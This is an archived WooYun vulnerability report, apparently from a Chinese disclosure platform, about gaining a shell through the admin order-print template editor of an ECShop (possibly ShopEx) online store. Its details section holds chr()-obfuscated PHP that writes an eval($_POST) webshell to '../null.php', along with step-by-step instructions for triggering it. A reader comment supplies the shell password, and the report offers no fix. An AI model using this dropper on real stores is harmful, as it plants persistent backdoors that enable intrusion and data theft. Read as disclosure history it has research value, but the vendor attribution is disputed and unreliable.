当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01636

漏洞标题:ecshop后台获取shell最新方法,通杀最新版本&后台低权限

相关厂商:ecshop

漏洞作者: 路人甲

提交时间:2011-03-18 10:33

修复时间:2011-03-18 12:12

公开时间:2011-03-18 12:12

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-03-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-03-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

后台可以提交构造代码绕过过滤,成功解析生成一句话木马.

详细说明:

<?php
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119);
$fp=@fopen($filen,$a);
$msg=@fwrite($fp,$filec);
if($msg) echo chr(79).chr(75).chr(33);
@fclose($fp);
?>


后台-订单管理-订单打印-选择源代码编辑-保存
返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!

漏洞证明:


修复方案:

null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)


漏洞评价:

评论

  1. 2011-03-18 13:08 | pg5yl8 ( 实习白帽子 | Rank:91 漏洞数:12 | 我神马都不会 但我常常被人日 这是为神马呢)

    不错 顶顶

  2. 2011-03-18 13:09 | null ( 路人 | Rank:15 漏洞数:2 | 左岸是无法忘却的回忆,右岸是值得把握的青...)

    杯具..我刚提交怎么就公开了 晕死

  3. 2011-03-18 14:22 | null ( 路人 | Rank:15 漏洞数:2 | 左岸是无法忘却的回忆,右岸是值得把握的青...)

    忘记了 一句话密码为usb

  4. 2011-04-23 13:26 | 结界师 认证白帽子 ( 普通白帽子 | Rank:564 漏洞数:27 | 只是另外的一只结界师!)

    你貌似写错了.....后台有点问题,这里厂商是shopex啊